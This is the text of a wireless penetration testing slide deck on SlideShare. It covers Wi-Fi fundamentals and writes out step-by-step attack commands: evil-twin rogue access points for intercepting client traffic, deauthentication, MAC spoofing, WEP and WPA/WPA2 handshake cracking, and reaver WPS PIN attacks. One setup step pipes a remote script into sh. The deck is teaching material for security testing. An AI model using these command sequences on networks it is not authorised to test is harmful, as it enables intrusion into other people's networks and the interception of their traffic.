SlideShare a Scribd company logo

Wireless Penetration Testing

Download as PPTX, PDF
Mohammed Adam
Mohammed Adam

In this slides deck, we gonna look into Wireless penetration testing requirements like hardware & software, Various IEEE standards. and also deep dive into WEP, WPA, WPA2 & its Security threats & Security best practices.

Technology
1 of 62
Wireless Penetration Testing
Agenda WIRELESS PENETRATION TESTING • Lab Setup • Wi-Fi Network Fundamentals • Wireless Packets • Wi-Fi Network Interaction • Wireless Reconnaissance • Rogue Access points • Cracking WEP • Cracking WPA/WPA2 • WPS Attacks • Security Best Practices
Lab Setup Hardware requirements • TP-Link WN722N • Alfa AWUS036H • Melon RTL8187L • Alfa AWUS036NHA • Panda PAU05 • Alfa AWUS036NEH
Hardware of my choice for this session: TL-WN722N Wi-Fi Adaptor
System Architecture • Minimum System Configuration • Windows 10 in Host Machine • Machine Specification: 4GB to 8GB RAM, 100GB HDD or SSD, 2CPU • Virtualisation Platform • Virtual box (https://www.virtualbox.org/) (or) • VMware (https://www.vmware.com/in/products/workstation- player/workstation-player-evaluation.html) • OS needs to be installed inside VM • Kali Linux (https://www.kali.org/get-kali/#kali-platforms)
Software Requirements • Aircrack-ng • Wifite • Bettercap • Johntheripper • Hashcat • coWPATTY • Kismet • Fluxion • Wi-Fi-Pumpkin
Wi-Fi Network Fundamentals IEEE 802.11 • IEEE 802.11 is part of the IEEE 802 set of local area network (LAN) technical standards, and specifies the set of media access control (MAC) and physical layer (PHY) protocols for implementing wireless local area network (WLAN) computer communication. • The standard and amendments provide the basis for wireless network products using the Wi-Fi brand and are the world's most widely used wireless computer networking standards. • IEEE 802.11 is used in most home and office networks to allow laptops, printers, smartphones, and other devices to communicate with each other and access the Internet without connecting wires. IEEE 802.11 is also a basis for vehicle-based communication networks with IEEE 802.11p.
IEEE 802.11 (Contd.) • The standards are created and maintained by the Institute of Electrical and Electronics Engineers (IEEE) LAN/MAN Standards Committee (IEEE 802). • The base version of the standard was released in 1997 and has had subsequent amendments. While each amendment is officially revoked when it is incorporated in the latest version of the standard, the corporate world tends to market to the revisions because they concisely denote the capabilities of their products. • IEEE 802.11 uses various frequencies including, but not limited to, 2.4 GHz, 5 GHz, 6 GHz, and 60 GHz frequency bands. Although IEEE 802.11 specifications list channels that might be used, the radio frequency spectrum availability allowed varies significantly by regulatory domain. • The protocols are typically used in conjunction with IEEE 802.2, and are designed to interwork seamlessly with Ethernet, and are very often used to carry Internet Protocol traffic.
Standards and Amendments
Standards and Amendments(Contd.)
In Process Standards
Wireless Lan: 802.11 Standards Comparison Wi-Fi 7 Expected to Launch in second half of 2024, Currently we are using Wi-Fi 6
Basic Terminologies
Basic Terminologies(Contd.) Access Point (AP) • AP is a networking hardware device that allows other Wi-Fi devices to connect to a wired network. • As a standalone device, the AP may have a wired connection to a router, but, in a wireless router, it can also be an integral component of the router itself. Service Set Identifier (SSID) • A service set identifier (SSID) is a sequence of characters that uniquely names a wireless local area network (WLAN). • An SSID is sometimes referred to as a "network name" This name allows stations to connect to the desired network when multiple independent networks operate in the same physical area.
Basic Terminologies(Contd.) Basic Service Set Identifier (BSSID) • Its the MAC physical address of the access point or wireless router that is used to connect to the Wi-Fi. Extended Service Set Identifier (ESSID) • It is a wireless network, created by multiple access points, which appears to users as a single, seamless network, such as a network covering a home or office that is too large for reliable coverage by a single access point. Roaming • Wi-Fi roaming occurs when a wireless client device moves outside the usable range of one router or access point (AP) and connects to a different one.
Basic Terminologies(Contd.) Channel • A Wi-Fi channel is the frequency at which your router sends out the information to your device. Most routers and devices support several bands for your Wi-Fi connection, most popular being 5 GHz and 2.4 GHz. Each of these ranges gets divided into smaller slots that are channels. Data Rate • Data rates varying modulation types and number of spatial streams; 200 Mbps, 400 Mbps, 433 Mbps, 600 Mbps, 867 Mbps. Beacon • Wi-Fi beacons are relatively short, regular transmissions from access points (APs) with a purpose to inform user devices (clients) about available Wi-Fi services and near-by access points. Clients use beacons to decide which AP with which to connect.
Wireless Operating modes
Wireless Operating modes (Contd.) • Managed - Managed mode allows you to configure your laptop or desktop system as an AP for providing connectivity to other wireless stations. • Ad-hoc - Ad-hoc mode refers to a wireless network structure where devices can communicate directly with each other. This type of wireless network is also called peer-to-peer mode. • Master - When your wireless card is in master mode it acts as an access point and it actively transmits a signal • Monitor - Monitor mode, or RFMON (Radio Frequency MONitor) mode, allows a computer with a wireless network interface controller (WNIC) to monitor all traffic received on a wireless channel. • Auto - the easiest way to configure a wireless interface and is enabled by default
TP-Link TL-WN722N Driver Software installation: • Sudo apt update • Sudo apt upgrade • Sudo apt dist-upgrade • Sudo reboot • Sudo apt install bc • Sudo apt get install build-essential • Sudo apt-get install libelf-dev • Sudo apt install linux-headers-amd64 • Echo "blacklist r8188eu" > "/etc/modprobe.d/realtek.conf" • Reboot • Git clone https://github.com/aircrack-ng/rtl8188eus • Cd rtl8188eus • sh -c "$(wget -O- https://gitlab.com/KanuX/rtl8188eus/-/raw/master/scripts/build.sh)"
Monitor Mode • Start the Kali OS in VMware or Virtual box • Plug-in USB Tplink Wireless Adapter (TL-WN722N) • Run following command • iwconfig
Monitor Mode(Contd.) • By default it will be in Auto or Managed mode • Run following commands to switch to Monitor mode • Airmon-ng start wlan0 • Airmon-ng check kill [if any previous processes are running do this] • iwconfig • To Disable monitor mode run airmon-ng stop wlan0 • Restart network manager – service network-manager start
Monitor Mode(Contd.)
Wireless Packets – IEEE 802.11 Mac Frame Structure
Wireless Packet Types
Analyzing Packets using Wireshark
Wi-Fi Network Interaction
Wi-Fi Authentication Methods
Wireless Encryption Protocols (WEP/WPA/WPA2)
WPA2 Authentication & Keys
WPA2 Personal and Enterprise
WPS (Wi-Fi Protected Setup)
Authentication
Wireless Reconnaissance • Tools required: Bettercap, airodump-ng & Kismet • In Bettercap, run following commands • Choose interface before, bettercap --iface wlan0 • Help wifi • Wifi.recon on • Wifi.show • Wifi.recon off
Wireless Reconnaissance with Bettercap
Wardriving with Kismet (Just for reference) • This can be achieved only, if we are moving or driving or roaming in a vehicle from multiple location to capture Wi-Fi hotspots with GPS Information. • Hardware required - Car, Laptop, Android Phone, Wifi Adapter • Software Required – Kismet, GPSD, ADB, Share GPS (AndroidApp), Google Earth • Reference blog link - https://veteransec.org/wifi-hacking-wardriving- with-an-android-phone-and-raspberry-pi-3/
Wardriving with WiGLE
Wireless Reconnaissance with Airodump-ng
Rogue Access points requirements • Tools Required: airodump-ng, airbase-ng, airmon-ng and Wi-Fi- pumpkin 3 • Wi-Fi pumpkin 3 installation • Git clone https://github.com/P0cL4bs/wifipumpkin3 • https://wifipumpkin3.github.io/docs/getting-started#installation • DNSmasq • apt-get install dnsmasq -y
Creation of Rogue AP using Wi-Fi Pumpkin 3 • Plugin wireless adapter & It doesn’t required monitor mode enabled. Run following commands • Wifipumpkin3 • Set interface wlan0 • Set ssid hello • Set proxy noproxy • Start • It will create an Rogue AP with Name With name Hello
Creation of Rogue AP using Wi-Fi Pumpkin 3 (Contd.) • Once any device is connected to Rogue AP “Hello” we can intercept the traffic of connected clients easily. (Eviltwin attack)
Creation of Rogue AP using Air-ng tools • Airodump-ng wlan0 • Airbase-ng -c 11 –e tplink –s –W 1 wlan0 • Airodump-ng –c 11 --bssid bssidoftplinknewlycreated –w 1 wlan0 • For Eviltwin/MITM attack we need DNSmasq • airbase-ng -e TP-Link -c 8 wlan0 [create fake ap for eviltwinattack] • at0 interface is created geany /etc/dnsmasq.conf interface=at0 dhcp-range=10.0.0.10,10.0.0.250,12h dhcp-option=3,10.0.0.1 dhcp-option=6,10.0.0.1 server=8.8.8.8 log-queries log-dhcp listen-address=127.0.0.1
Creation of Rogue AP using Air-ng tools (Contd.) Run below commands in separate terminal • ifconfig at0 up • ifconfig at0 10.0.0.1 netmask 255.255.255.0 • route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 • iptables -P FORWARD ACCEPT • iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE • echo '1' > /proc/sys/net/ipv4/ip_forward • dnsmasq -C /etc/dnsmasq.conf -d • Connect with any device now, we can see the traffic
Sniffing with Dnsmasq
Cracking WEP Create a rogue access point with WEP Cipher • Airbase-ng –c 11 –e hello –w 31:32:33:34:35 wlan0 Use the same Dnsmasq config here • ifconfig at0 up • ifconfig at0 10.0.0.1 netmask 255.255.255.0 • route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 • iptables -P FORWARD ACCEPT • iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE • echo '1' > /proc/sys/net/ipv4/ip_forward • dnsmasq -C /etc/dnsmasq.conf -d • Connect with device with WEP Fake AP • Airodump-ng wlan0 [ to check whether the fake ap is Up or not]
Cracking WEP(Contd.) • DeAuthentication attack with aireplay-ng • Aireplay-ng --deauth 0 –a macaddressoffakeAP –c macaddressofclientconnected wlan0 • DeAuthentication attack with bettercap • Bettercap --iface wlan0 • Wifi.recon on & wifi.show • Wifi.deauth macaddressoffakeAP • Macchanger • Ifconfig wlan0 down • Macchanger –r wlan0 • Ifconfig wlan0 up
Cracking WEP(Contd.) • Airdump-ng to dump the wep.cap file • airodump-ng -c 11 --bssid macaddfakeAP –w wepcrack wlan0 • Fake Authentication • Aireplay-ng --fakeauth 60 –e hello –a macaddresfakeAP –h macaddressofwlan0 wlan0 • ARP Request Replay attack • Aireplay-ng --arpreplay -e hello -a macaddfakeAP -h macaddrwlan0 wlan0 • Again perform deauth attack • Aireplay-ng --deauth 0 –a macaddfakeAP -c macaddrclientconnected wlan0 • Stop the deauth • Crack the WEP captured file using aircrack-ng • Aircrack-ng wep-cracking.cap [it will crack the WEP key]
Cracking WEP(Contd.)
Cracking WEPDUMP File using Aircrack-ng
Cracking WEP using Wifite
Cracking WPA/WPA2
Password Wordlists (Seclists)
Password Wordlists (Weakpass.com)
Password Wordlists (wiki.skullsecurity.org)
Capture the WPA/WPA2 Handshake file • Run the following commands: • airmon-ng start wlan0 [Put the wireless adapter in Monitor mode] • airodump-ng wlan0 [Listen to all the APs which are alive] • airodump-ng -c 6 --bssid macaddrwpaAP -w wpacracking wlan0 [capture wpacracking handshake file with airodump-ng] • Do a Deauthentication attack manually by disconnection/connecting your mobile device to that AP • aircrack-ng wpacracking-01.cap -w /usr/share/dict/wordlist-probable.txt [Pass the wordlist with handshake file]
Capture the WPA/WPA2 Handshake file(Contd.)
Cracking WPA/WPA2 using John the Ripper • John --wordlist=/usr/share/dict/wordlist-probable.txt --rules --stdout | aircrack-ng -e tplink -w - wpacracking.cap
Cracking WPA/WPA2 using Wifite • Wifite –wpa • Before starting the attack connect with a client device
Cracking WPS
Cracking WPS (PIN attacks) • wifite --wps [Using Wifite] • reaver -i wlan0mon -b <bssid> -vv -L -N -c 1 –K [Using Reaver]
Next-Gen Wireless Assessment tools Wi-Fi Pineapple
Security Best Practices • Change default passwords • Restrict access to authorized users • Encrypt the data on your network • Protect your Service Set Identifier (SSID) • Install a firewall • Maintain antivirus software • Use file sharing with caution • Keep your access point software patched and up to date • Check your internet provider’s or router manufacturer’s wireless security options • Connect using a Virtual Private Network (VPN) Reference blog link - https://www.cisa.gov/uscert/ncas/tips/ST05-003
THANK YOU !

Recommended

Privilege escalation from 1 to 0 Workshop
Privilege escalation from 1 to 0 Workshop Privilege escalation from 1 to 0 Workshop
Privilege escalation from 1 to 0 Workshop Hossam .M Hamed
 
Wi-fi Hacking
Wi-fi HackingWi-fi Hacking
Wi-fi HackingPaul Gillingwater, MBA
 
Fortinet FortiOS 5 Presentation
Fortinet FortiOS 5 PresentationFortinet FortiOS 5 Presentation
Fortinet FortiOS 5 PresentationNCS Computech Ltd.
 
NMAP - The Network Scanner
NMAP - The Network ScannerNMAP - The Network Scanner
NMAP - The Network Scannern|u - The Open Security Community
 
WLAN Attacks and Protection
WLAN Attacks and ProtectionWLAN Attacks and Protection
WLAN Attacks and ProtectionChandrak Trivedi
 
Firewall protection
Firewall protectionFirewall protection
Firewall protectionVC Infotech
 
No Easy Breach DerbyCon 2016
No Easy Breach DerbyCon 2016No Easy Breach DerbyCon 2016
No Easy Breach DerbyCon 2016Matthew Dunwoody
 
Proxy servers
Proxy serversProxy servers
Proxy serversKumar
 

Recommended

Privilege escalation from 1 to 0 Workshop
Privilege escalation from 1 to 0 Workshop Privilege escalation from 1 to 0 Workshop
Privilege escalation from 1 to 0 Workshop Hossam .M Hamed
 
Wi-fi Hacking
Wi-fi HackingWi-fi Hacking
Wi-fi HackingPaul Gillingwater, MBA
 
Fortinet FortiOS 5 Presentation
Fortinet FortiOS 5 PresentationFortinet FortiOS 5 Presentation
Fortinet FortiOS 5 PresentationNCS Computech Ltd.
 
NMAP - The Network Scanner
NMAP - The Network ScannerNMAP - The Network Scanner
NMAP - The Network Scannern|u - The Open Security Community
 
WLAN Attacks and Protection
WLAN Attacks and ProtectionWLAN Attacks and Protection
WLAN Attacks and ProtectionChandrak Trivedi
 
Firewall protection
Firewall protectionFirewall protection
Firewall protectionVC Infotech
 
No Easy Breach DerbyCon 2016
No Easy Breach DerbyCon 2016No Easy Breach DerbyCon 2016
No Easy Breach DerbyCon 2016Matthew Dunwoody
 
Proxy servers
Proxy serversProxy servers
Proxy serversKumar
 
Traditional Firewall vs. Next Generation Firewall
Traditional Firewall vs. Next Generation FirewallTraditional Firewall vs. Next Generation Firewall
Traditional Firewall vs. Next Generation Firewall美兰 曾
 
Zero Trust Network Access
Zero Trust Network Access Zero Trust Network Access
Zero Trust Network Access Er. Ajay Sirsat
 
Penetration Testing Tutorial | Penetration Testing Tools | Cyber Security Tra...
Penetration Testing Tutorial | Penetration Testing Tools | Cyber Security Tra...Penetration Testing Tutorial | Penetration Testing Tools | Cyber Security Tra...
Penetration Testing Tutorial | Penetration Testing Tools | Cyber Security Tra...Edureka!
 
Aircrack
AircrackAircrack
AircrackMuhammadHanzalah6
 
Wi-Fi Security Presentation.pptx
Wi-Fi Security Presentation.pptxWi-Fi Security Presentation.pptx
Wi-Fi Security Presentation.pptxMairajuddeen
 
Pen Testing Explained
Pen Testing ExplainedPen Testing Explained
Pen Testing ExplainedRand W. Hirt
 
Ethical hacking : Its methodologies and tools
Ethical hacking : Its methodologies and toolsEthical hacking : Its methodologies and tools
Ethical hacking : Its methodologies and toolschrizjohn896
 
Introduction To OWASP
Introduction To OWASPIntroduction To OWASP
Introduction To OWASPMarco Morana
 
VAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptxVAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptxDARSHANBHAVSAR14
 
Linux privilege escalation
Linux privilege escalationLinux privilege escalation
Linux privilege escalationSongchaiDuangpan
 
Understanding Penetration Testing & its Benefits for Organization
Understanding Penetration Testing & its Benefits for OrganizationUnderstanding Penetration Testing & its Benefits for Organization
Understanding Penetration Testing & its Benefits for OrganizationPECB
 
Authentication, authorization, accounting(aaa) slides
Authentication, authorization, accounting(aaa) slidesAuthentication, authorization, accounting(aaa) slides
Authentication, authorization, accounting(aaa) slidesrahul kundu
 
Firewalls
FirewallsFirewalls
FirewallsKalluri Madhuri
 
F5 Web Application Security
F5 Web Application SecurityF5 Web Application Security
F5 Web Application SecurityMarketingArrowECS_CZ
 
Ethical Hacking PPT (CEH)
Ethical Hacking PPT (CEH)Ethical Hacking PPT (CEH)
Ethical Hacking PPT (CEH)Umesh Mahawar
 
Secure Your Encryption with HSM
Secure Your Encryption with HSMSecure Your Encryption with HSM
Secure Your Encryption with HSMNarudom Roongsiriwong, CISSP
 
Presentation fortinet securing the cloud
Presentation fortinet securing the cloudPresentation fortinet securing the cloud
Presentation fortinet securing the cloudxKinAnx
 
Wi-FI Hacking
Wi-FI Hacking Wi-FI Hacking
Wi-FI Hacking Mehul Jariwala
 
Zero Trust Model Presentation
Zero Trust Model PresentationZero Trust Model Presentation
Zero Trust Model PresentationGowdhaman Jothilingam
 
penetration test using Kali linux ppt
penetration test using Kali linux pptpenetration test using Kali linux ppt
penetration test using Kali linux pptAbhayNaik8
 
Openwrt wireless
Openwrt wirelessOpenwrt wireless
Openwrt wireless晓东 杜
 
Embedded Systems: Lecture 8: Lab 1: Building a Raspberry Pi Based WiFi AP
Embedded Systems: Lecture 8: Lab 1: Building a Raspberry Pi Based WiFi APEmbedded Systems: Lecture 8: Lab 1: Building a Raspberry Pi Based WiFi AP
Embedded Systems: Lecture 8: Lab 1: Building a Raspberry Pi Based WiFi APAhmed El-Arabawy
 

More Related Content

What's hot

Traditional Firewall vs. Next Generation Firewall
Traditional Firewall vs. Next Generation FirewallTraditional Firewall vs. Next Generation Firewall
Traditional Firewall vs. Next Generation Firewall美兰 曾
 
Zero Trust Network Access
Zero Trust Network Access Zero Trust Network Access
Zero Trust Network Access Er. Ajay Sirsat
 
Penetration Testing Tutorial | Penetration Testing Tools | Cyber Security Tra...
Penetration Testing Tutorial | Penetration Testing Tools | Cyber Security Tra...Penetration Testing Tutorial | Penetration Testing Tools | Cyber Security Tra...
Penetration Testing Tutorial | Penetration Testing Tools | Cyber Security Tra...Edureka!
 
Wi-Fi Security Presentation.pptx
Wi-Fi Security Presentation.pptxWi-Fi Security Presentation.pptx
Wi-Fi Security Presentation.pptxMairajuddeen
 
Pen Testing Explained
Pen Testing ExplainedPen Testing Explained
Pen Testing ExplainedRand W. Hirt
 
Ethical hacking : Its methodologies and tools
Ethical hacking : Its methodologies and toolsEthical hacking : Its methodologies and tools
Ethical hacking : Its methodologies and toolschrizjohn896
 
Introduction To OWASP
Introduction To OWASPIntroduction To OWASP
Introduction To OWASPMarco Morana
 
VAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptxVAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptxDARSHANBHAVSAR14
 
Linux privilege escalation
Linux privilege escalationLinux privilege escalation
Linux privilege escalationSongchaiDuangpan
 
Understanding Penetration Testing & its Benefits for Organization
Understanding Penetration Testing & its Benefits for OrganizationUnderstanding Penetration Testing & its Benefits for Organization
Understanding Penetration Testing & its Benefits for OrganizationPECB
 
Authentication, authorization, accounting(aaa) slides
Authentication, authorization, accounting(aaa) slidesAuthentication, authorization, accounting(aaa) slides
Authentication, authorization, accounting(aaa) slidesrahul kundu
 
Ethical Hacking PPT (CEH)
Ethical Hacking PPT (CEH)Ethical Hacking PPT (CEH)
Ethical Hacking PPT (CEH)Umesh Mahawar
 
Presentation fortinet securing the cloud
Presentation fortinet securing the cloudPresentation fortinet securing the cloud
Presentation fortinet securing the cloudxKinAnx
 
penetration test using Kali linux ppt
penetration test using Kali linux pptpenetration test using Kali linux ppt
penetration test using Kali linux pptAbhayNaik8
 

What's hot (20)

Traditional Firewall vs. Next Generation Firewall
Traditional Firewall vs. Next Generation FirewallTraditional Firewall vs. Next Generation Firewall
Traditional Firewall vs. Next Generation Firewall
 
Zero Trust Network Access
Zero Trust Network Access Zero Trust Network Access
Zero Trust Network Access
 
Penetration Testing Tutorial | Penetration Testing Tools | Cyber Security Tra...
Penetration Testing Tutorial | Penetration Testing Tools | Cyber Security Tra...Penetration Testing Tutorial | Penetration Testing Tools | Cyber Security Tra...
Penetration Testing Tutorial | Penetration Testing Tools | Cyber Security Tra...
 
Aircrack
AircrackAircrack
Aircrack
 
Wi-Fi Security Presentation.pptx
Wi-Fi Security Presentation.pptxWi-Fi Security Presentation.pptx
Wi-Fi Security Presentation.pptx
 
Pen Testing Explained
Pen Testing ExplainedPen Testing Explained
Pen Testing Explained
 
Ethical hacking : Its methodologies and tools
Ethical hacking : Its methodologies and toolsEthical hacking : Its methodologies and tools
Ethical hacking : Its methodologies and tools
 
Introduction To OWASP
Introduction To OWASPIntroduction To OWASP
Introduction To OWASP
 
VAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptxVAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptx
 
Linux privilege escalation
Linux privilege escalationLinux privilege escalation
Linux privilege escalation
 
Understanding Penetration Testing & its Benefits for Organization
Understanding Penetration Testing & its Benefits for OrganizationUnderstanding Penetration Testing & its Benefits for Organization
Understanding Penetration Testing & its Benefits for Organization
 
Authentication, authorization, accounting(aaa) slides
Authentication, authorization, accounting(aaa) slidesAuthentication, authorization, accounting(aaa) slides
Authentication, authorization, accounting(aaa) slides
 
Firewalls
FirewallsFirewalls
Firewalls
 
F5 Web Application Security
F5 Web Application SecurityF5 Web Application Security
F5 Web Application Security
 
Ethical Hacking PPT (CEH)
Ethical Hacking PPT (CEH)Ethical Hacking PPT (CEH)
Ethical Hacking PPT (CEH)
 
Secure Your Encryption with HSM
Secure Your Encryption with HSMSecure Your Encryption with HSM
Secure Your Encryption with HSM
 
Presentation fortinet securing the cloud
Presentation fortinet securing the cloudPresentation fortinet securing the cloud
Presentation fortinet securing the cloud
 
Wi-FI Hacking
Wi-FI Hacking Wi-FI Hacking
Wi-FI Hacking
 
Zero Trust Model Presentation
Zero Trust Model PresentationZero Trust Model Presentation
Zero Trust Model Presentation
 
penetration test using Kali linux ppt
penetration test using Kali linux pptpenetration test using Kali linux ppt
penetration test using Kali linux ppt
 

Similar to Wireless Penetration Testing

Openwrt wireless
Openwrt wirelessOpenwrt wireless
Openwrt wireless晓东 杜
 
Embedded Systems: Lecture 8: Lab 1: Building a Raspberry Pi Based WiFi AP
Embedded Systems: Lecture 8: Lab 1: Building a Raspberry Pi Based WiFi APEmbedded Systems: Lecture 8: Lab 1: Building a Raspberry Pi Based WiFi AP
Embedded Systems: Lecture 8: Lab 1: Building a Raspberry Pi Based WiFi APAhmed El-Arabawy
 
Fudcon 2015...Wireless: From Basics to Internals
Fudcon 2015...Wireless: From Basics to InternalsFudcon 2015...Wireless: From Basics to Internals
Fudcon 2015...Wireless: From Basics to InternalsKiran Divekar
 
Webinar NETGEAR - Nuovi AP Professionali Prosafe WAC720 e WAC730
Webinar NETGEAR - Nuovi AP Professionali Prosafe WAC720 e WAC730Webinar NETGEAR - Nuovi AP Professionali Prosafe WAC720 e WAC730
Webinar NETGEAR - Nuovi AP Professionali Prosafe WAC720 e WAC730Netgear Italia
 
CENTRAL MANAGEMENT OF NETWORK AND CALL SERVICES
CENTRAL MANAGEMENT OF NETWORK AND CALL SERVICESCENTRAL MANAGEMENT OF NETWORK AND CALL SERVICES
CENTRAL MANAGEMENT OF NETWORK AND CALL SERVICESNazmul Hossain Rakib
 
Basic Cisco ASA 5506-x Configuration (Firepower)
Basic Cisco ASA 5506-x Configuration (Firepower)Basic Cisco ASA 5506-x Configuration (Firepower)
Basic Cisco ASA 5506-x Configuration (Firepower)NetProtocol Xpert
 
Рекомендации по настройке контроллеров БЛВС Cisco
Рекомендации по настройке контроллеров БЛВС CiscoРекомендации по настройке контроллеров БЛВС Cisco
Рекомендации по настройке контроллеров БЛВС CiscoCisco Russia
 
Wireless Security null seminar
Wireless Security null seminarWireless Security null seminar
Wireless Security null seminarNilesh Sapariya
 
How–To setup Wi-Fi Client Router Mode as [CPE] connect to [WISP AP] & Using E...
How–To setup Wi-Fi Client Router Mode as [CPE] connect to [WISP AP] & Using E...How–To setup Wi-Fi Client Router Mode as [CPE] connect to [WISP AP] & Using E...
How–To setup Wi-Fi Client Router Mode as [CPE] connect to [WISP AP] & Using E...Tũi Wichets
 
VMworld 2013: vCloud Hybrid Service Jump Start Part Two of Five: vCloud Hybri...
VMworld 2013: vCloud Hybrid Service Jump Start Part Two of Five: vCloud Hybri...VMworld 2013: vCloud Hybrid Service Jump Start Part Two of Five: vCloud Hybri...
VMworld 2013: vCloud Hybrid Service Jump Start Part Two of Five: vCloud Hybri...VMworld
 
WiFi Hotspot-Wireless Router
WiFi Hotspot-Wireless RouterWiFi Hotspot-Wireless Router
WiFi Hotspot-Wireless RouterWispot
 
Wireless lan electronics and communication engineering
Wireless lan electronics and communication engineeringWireless lan electronics and communication engineering
Wireless lan electronics and communication engineeringeceb9198
 
Finding Your Wavelength in Wireless
Finding Your Wavelength in WirelessFinding Your Wavelength in Wireless
Finding Your Wavelength in Wirelesseaze_50
 

Similar to Wireless Penetration Testing (20)

Openwrt wireless
Openwrt wirelessOpenwrt wireless
Openwrt wireless
 
Embedded Systems: Lecture 8: Lab 1: Building a Raspberry Pi Based WiFi AP
Embedded Systems: Lecture 8: Lab 1: Building a Raspberry Pi Based WiFi APEmbedded Systems: Lecture 8: Lab 1: Building a Raspberry Pi Based WiFi AP
Embedded Systems: Lecture 8: Lab 1: Building a Raspberry Pi Based WiFi AP
 
Fudcon 2015...Wireless: From Basics to Internals
Fudcon 2015...Wireless: From Basics to InternalsFudcon 2015...Wireless: From Basics to Internals
Fudcon 2015...Wireless: From Basics to Internals
 
Webinar NETGEAR - Nuovi AP Professionali Prosafe WAC720 e WAC730
Webinar NETGEAR - Nuovi AP Professionali Prosafe WAC720 e WAC730Webinar NETGEAR - Nuovi AP Professionali Prosafe WAC720 e WAC730
Webinar NETGEAR - Nuovi AP Professionali Prosafe WAC720 e WAC730
 
CENTRAL MANAGEMENT OF NETWORK AND CALL SERVICES
CENTRAL MANAGEMENT OF NETWORK AND CALL SERVICESCENTRAL MANAGEMENT OF NETWORK AND CALL SERVICES
CENTRAL MANAGEMENT OF NETWORK AND CALL SERVICES
 
Basic Cisco ASA 5506-x Configuration (Firepower)
Basic Cisco ASA 5506-x Configuration (Firepower)Basic Cisco ASA 5506-x Configuration (Firepower)
Basic Cisco ASA 5506-x Configuration (Firepower)
 
66 pf sensetutorial
66 pf sensetutorial66 pf sensetutorial
66 pf sensetutorial
 
66_pfSenseTutorial
66_pfSenseTutorial66_pfSenseTutorial
66_pfSenseTutorial
 
66_pfSenseTutorial
66_pfSenseTutorial66_pfSenseTutorial
66_pfSenseTutorial
 
Wi-Fi Module
Wi-Fi ModuleWi-Fi Module
Wi-Fi Module
 
2012 ah vegas remote networking fundamentals
2012 ah vegas remote networking fundamentals2012 ah vegas remote networking fundamentals
2012 ah vegas remote networking fundamentals
 
Рекомендации по настройке контроллеров БЛВС Cisco
Рекомендации по настройке контроллеров БЛВС CiscoРекомендации по настройке контроллеров БЛВС Cisco
Рекомендации по настройке контроллеров БЛВС Cisco
 
Wireless Security null seminar
Wireless Security null seminarWireless Security null seminar
Wireless Security null seminar
 
How–To setup Wi-Fi Client Router Mode as [CPE] connect to [WISP AP] & Using E...
How–To setup Wi-Fi Client Router Mode as [CPE] connect to [WISP AP] & Using E...How–To setup Wi-Fi Client Router Mode as [CPE] connect to [WISP AP] & Using E...
How–To setup Wi-Fi Client Router Mode as [CPE] connect to [WISP AP] & Using E...
 
Etherfast3828
Etherfast3828Etherfast3828
Etherfast3828
 
VMworld 2013: vCloud Hybrid Service Jump Start Part Two of Five: vCloud Hybri...
VMworld 2013: vCloud Hybrid Service Jump Start Part Two of Five: vCloud Hybri...VMworld 2013: vCloud Hybrid Service Jump Start Part Two of Five: vCloud Hybri...
VMworld 2013: vCloud Hybrid Service Jump Start Part Two of Five: vCloud Hybri...
 
WiFi Hotspot-Wireless Router
WiFi Hotspot-Wireless RouterWiFi Hotspot-Wireless Router
WiFi Hotspot-Wireless Router
 
Wireless lan electronics and communication engineering
Wireless lan electronics and communication engineeringWireless lan electronics and communication engineering
Wireless lan electronics and communication engineering
 
Finding Your Wavelength in Wireless
Finding Your Wavelength in WirelessFinding Your Wavelength in Wireless
Finding Your Wavelength in Wireless
 
Process for joining to the FIWARE Lab
Process for joining to the FIWARE LabProcess for joining to the FIWARE Lab
Process for joining to the FIWARE Lab
 

More from Mohammed Adam

Android Penetration Testing - Day 3
Android Penetration Testing - Day 3Android Penetration Testing - Day 3
Android Penetration Testing - Day 3Mohammed Adam
 
Android Penetration testing - Day 2
Android Penetration testing - Day 2 Android Penetration testing - Day 2
Android Penetration testing - Day 2Mohammed Adam
 
Android Penetration Testing - Day 1
Android Penetration Testing - Day 1Android Penetration Testing - Day 1
Android Penetration Testing - Day 1Mohammed Adam
 
Network Penetration Testing
Network Penetration TestingNetwork Penetration Testing
Network Penetration TestingMohammed Adam
 
Basic Foundation For Cybersecurity
Basic Foundation For CybersecurityBasic Foundation For Cybersecurity
Basic Foundation For CybersecurityMohammed Adam
 
Golden Ticket Attack - AD - Domain Persistence
Golden Ticket Attack - AD - Domain PersistenceGolden Ticket Attack - AD - Domain Persistence
Golden Ticket Attack - AD - Domain PersistenceMohammed Adam
 
Evading Antivirus software for fun and profit
Evading Antivirus software for fun and profitEvading Antivirus software for fun and profit
Evading Antivirus software for fun and profitMohammed Adam
 
Introduction to Network Fundamentals
Introduction to Network FundamentalsIntroduction to Network Fundamentals
Introduction to Network FundamentalsMohammed Adam
 
Breaking out of crypto authentication
Breaking out of crypto authenticationBreaking out of crypto authentication
Breaking out of crypto authenticationMohammed Adam
 
Cybersecurity Awareness Session by Adam
Cybersecurity Awareness Session by AdamCybersecurity Awareness Session by Adam
Cybersecurity Awareness Session by AdamMohammed Adam
 
Career Guidance on Cybersecurity by Mohammed Adam
Career Guidance on Cybersecurity by Mohammed AdamCareer Guidance on Cybersecurity by Mohammed Adam
Career Guidance on Cybersecurity by Mohammed AdamMohammed Adam
 
Introduction to null villupuram community
Introduction to null villupuram communityIntroduction to null villupuram community
Introduction to null villupuram communityMohammed Adam
 
BugBounty Roadmap with Mohammed Adam
BugBounty Roadmap with Mohammed AdamBugBounty Roadmap with Mohammed Adam
BugBounty Roadmap with Mohammed AdamMohammed Adam
 
Webinar On Ethical Hacking & Cybersecurity - Day2
Webinar On Ethical Hacking & Cybersecurity - Day2Webinar On Ethical Hacking & Cybersecurity - Day2
Webinar On Ethical Hacking & Cybersecurity - Day2Mohammed Adam
 
OSINT - Open Soure Intelligence - Webinar on CyberSecurity
OSINT - Open Soure Intelligence - Webinar on CyberSecurityOSINT - Open Soure Intelligence - Webinar on CyberSecurity
OSINT - Open Soure Intelligence - Webinar on CyberSecurityMohammed Adam
 
